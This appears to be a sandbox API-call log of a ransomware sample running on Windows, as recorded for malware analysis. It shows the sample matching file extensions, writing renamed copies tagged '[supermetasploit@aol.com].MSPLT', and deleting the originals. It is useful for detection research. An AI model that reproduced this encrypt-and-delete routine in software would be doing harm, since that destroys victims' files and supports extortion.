[0173.365] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.365] lstrlenW (lpString=".ppt") returned 4 [0173.365] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString=".zip") returned 4 [0173.365] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString=".rar") returned 4 [0173.366] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.366] lstrlenW (lpString=".bz2") returned 4 [0173.366] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.366] lstrlenW (lpString=".7z") returned 3 [0173.366] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.366] lstrlenW (lpString=".dbf") returned 4 [0173.366] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.366] lstrlenW (lpString=".1cd") returned 4 [0173.366] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.366] lstrlenW (lpString=".jpg") returned 4 [0173.366] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.366] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.366] lstrlenW (lpString="delete.avi") returned 10 [0173.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.367] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=208408) returned 1 [0173.367] CloseHandle (hObject=0x348) returned 1 [0173.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0173.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.367] lstrlenW (lpString=".doc") returned 4 [0173.367] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.367] lstrlenW (lpString=".docx") returned 5 [0173.367] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0173.367] lstrlenW (lpString=".pdf") returned 4 [0173.367] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.367] lstrlenW (lpString=".xls") returned 4 [0173.367] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.367] lstrlenW (lpString=".xlsx") returned 5 [0173.367] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0173.367] lstrlenW (lpString=".ppt") returned 4 [0173.367] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString=".zip") returned 4 [0173.368] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".rar") returned 4 [0173.368] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".bz2") returned 4 [0173.368] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".7z") returned 3 [0173.368] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString=".dbf") returned 4 [0173.368] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString=".1cd") returned 4 [0173.368] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString=".jpg") returned 4 [0173.368] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.368] lstrlenW (lpString=".doc") returned 4 [0173.368] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".docx") returned 5 [0173.368] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0173.368] lstrlenW (lpString=".pdf") returned 4 [0173.368] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".xls") returned 4 [0173.368] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.368] lstrlenW (lpString=".xlsx") returned 5 [0173.369] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0173.369] lstrlenW (lpString=".ppt") returned 4 [0173.369] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.369] lstrlenW (lpString=".zip") returned 4 [0173.369] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.369] lstrlenW (lpString=".rar") returned 4 [0173.369] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.369] lstrlenW (lpString=".bz2") returned 4 [0173.369] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.369] lstrlenW (lpString=".7z") returned 3 [0173.369] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.369] lstrlenW (lpString=".dbf") returned 4 [0173.369] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.369] lstrlenW (lpString=".1cd") returned 4 [0173.369] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0173.369] lstrlenW (lpString=".jpg") returned 4 [0173.369] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.369] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.369] lstrlenW (lpString="join.avi") returned 8 [0173.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.370] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=199994) returned 1 [0173.370] CloseHandle (hObject=0x348) returned 1 [0173.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0173.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0173.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0173.370] lstrlenW (lpString=".doc") returned 4 [0173.370] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.370] lstrlenW (lpString=".docx") returned 5 [0173.370] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0173.370] lstrlenW (lpString=".pdf") returned 4 [0173.370] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString=".xls") returned 4 [0173.371] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString=".xlsx") returned 5 [0173.371] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0173.371] lstrlenW (lpString=".ppt") returned 4 [0173.371] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0173.371] lstrlenW (lpString=".zip") returned 4 [0173.371] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString=".rar") returned 4 [0173.371] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString=".bz2") returned 4 [0173.371] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.371] lstrlenW (lpString=".7z") returned 3 [0173.371] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0173.371] lstrlenW (lpString=".dbf") returned 4 [0173.371] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.390] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0174.356] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.356] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.356] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.357] GetLastError () returned 0x0 [0174.357] ReadFile (in: hFile=0x374, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xae, lpOverlapped=0x0) returned 1 [0174.360] WriteFile (in: hFile=0x348, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xb0, lpOverlapped=0x0) returned 1 [0174.361] ReadFile (in: hFile=0x374, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0174.361] WriteFile (in: hFile=0x348, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xea, lpOverlapped=0x0) returned 1 [0174.361] SetEndOfFile (hFile=0x348) returned 1 [0174.362] CloseHandle (hObject=0x348) returned 1 [0174.363] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.363] SetEndOfFile (hFile=0x374) returned 1 [0174.368] CloseHandle (hObject=0x374) returned 1 [0174.368] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0174.369] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0174.369] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.369] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.369] lstrlenW (lpString=".doc") returned 4 [0174.369] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0174.369] lstrlenW (lpString=".docx") returned 5 [0174.369] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0174.369] lstrlenW (lpString=".pdf") returned 4 [0174.370] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString=".xls") returned 4 [0174.370] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString=".xlsx") returned 5 [0174.370] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0174.370] lstrlenW (lpString=".ppt") returned 4 [0174.370] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.370] lstrlenW (lpString=".zip") returned 4 [0174.370] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString=".rar") returned 4 [0174.370] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString=".bz2") returned 4 [0174.370] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0174.370] lstrlenW (lpString=".7z") returned 3 [0174.370] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0174.370] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.370] lstrlenW (lpString=".dbf") returned 4 [0174.370] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0174.370] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.370] lstrlenW (lpString=".1cd") returned 4 [0174.370] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0174.370] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.370] lstrlenW (lpString=".jpg") returned 4 [0174.370] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0174.370] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.371] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.371] lstrlenW (lpString=".doc") returned 4 [0174.371] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0174.371] lstrlenW (lpString=".docx") returned 5 [0174.371] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0174.371] lstrlenW (lpString=".pdf") returned 4 [0174.371] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0174.371] lstrlenW (lpString=".xls") returned 4 [0174.371] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0174.371] lstrlenW (lpString=".xlsx") returned 5 [0174.371] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0174.371] lstrlenW (lpString=".ppt") returned 4 [0174.371] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0174.371] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.371] lstrlenW (lpString=".zip") returned 4 [0174.371] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0174.371] lstrlenW (lpString=".rar") returned 4 [0174.371] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0174.371] lstrlenW (lpString=".bz2") returned 4 [0174.371] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0174.371] lstrlenW (lpString=".7z") returned 3 [0174.371] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0174.371] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.371] lstrlenW (lpString=".dbf") returned 4 [0174.372] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0174.372] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.372] lstrlenW (lpString=".1cd") returned 4 [0174.372] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0174.372] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0174.372] lstrlenW (lpString=".jpg") returned 4 [0174.372] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0174.372] lstrcmpiW (lpString1=".txt", lpString2=".MSPLT") returned 1 [0174.372] lstrlenW (lpString="Xusage.txt") returned 10 [0174.372] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.372] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=1423) returned 1 [0174.373] CloseHandle (hObject=0x374) returned 1 [0174.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 0x20 [0174.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.373] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.373] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.373] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.373] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.374] GetLastError () returned 0x0 [0174.374] ReadFile (in: hFile=0x374, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x58f, lpOverlapped=0x0) returned 1 [0174.378] WriteFile (in: hFile=0x348, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x590, lpOverlapped=0x0) returned 1 [0174.380] ReadFile (in: hFile=0x374, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0174.380] WriteFile (in: hFile=0x348, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe8, lpOverlapped=0x0) returned 1 [0174.380] SetEndOfFile (hFile=0x348) returned 1 [0174.380] CloseHandle (hObject=0x348) returned 1 [0174.383] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.383] SetEndOfFile (hFile=0x374) returned 1 [0174.384] CloseHandle (hObject=0x374) returned 1 [0174.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.384] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 1 [0174.385] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.385] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.385] lstrlenW (lpString=".doc") returned 4 [0174.385] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.385] lstrlenW (lpString=".docx") returned 5 [0174.385] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0174.385] lstrlenW (lpString=".pdf") returned 4 [0174.385] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.385] lstrlenW (lpString=".xls") returned 4 [0174.385] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.385] lstrlenW (lpString=".xlsx") returned 5 [0174.385] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0174.385] lstrlenW (lpString=".ppt") returned 4 [0174.385] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.385] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.385] lstrlenW (lpString=".zip") returned 4 [0174.385] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.385] lstrlenW (lpString=".rar") returned 4 [0174.385] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.385] lstrlenW (lpString=".bz2") returned 4 [0174.385] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.385] lstrlenW (lpString=".7z") returned 3 [0174.385] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.385] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString=".dbf") returned 4 [0174.386] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString=".1cd") returned 4 [0174.386] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString=".jpg") returned 4 [0174.386] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString=".doc") returned 4 [0174.386] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString=".docx") returned 5 [0174.386] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0174.386] lstrlenW (lpString=".pdf") returned 4 [0174.386] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString=".xls") returned 4 [0174.386] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.386] lstrlenW (lpString=".xlsx") returned 5 [0174.386] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0174.386] lstrlenW (lpString=".ppt") returned 4 [0174.386] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.386] lstrlenW (lpString=".zip") returned 4 [0174.386] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.386] lstrlenW (lpString=".rar") returned 4 [0174.386] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.386] lstrlenW (lpString=".bz2") returned 4 [0174.387] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.387] lstrlenW (lpString=".7z") returned 3 [0174.387] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.872] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.872] lstrlenW (lpString=".dbf") returned 4 [0174.872] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.872] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.872] lstrlenW (lpString=".1cd") returned 4 [0174.872] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.872] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0174.872] lstrlenW (lpString=".jpg") returned 4 [0174.872] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.872] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.872] lstrlenW (lpString="win32_MoveDrop32x32.gif") returned 23 [0174.872] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.873] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=147) returned 1 [0174.874] CloseHandle (hObject=0x348) returned 1 [0174.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 0x20 [0174.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff 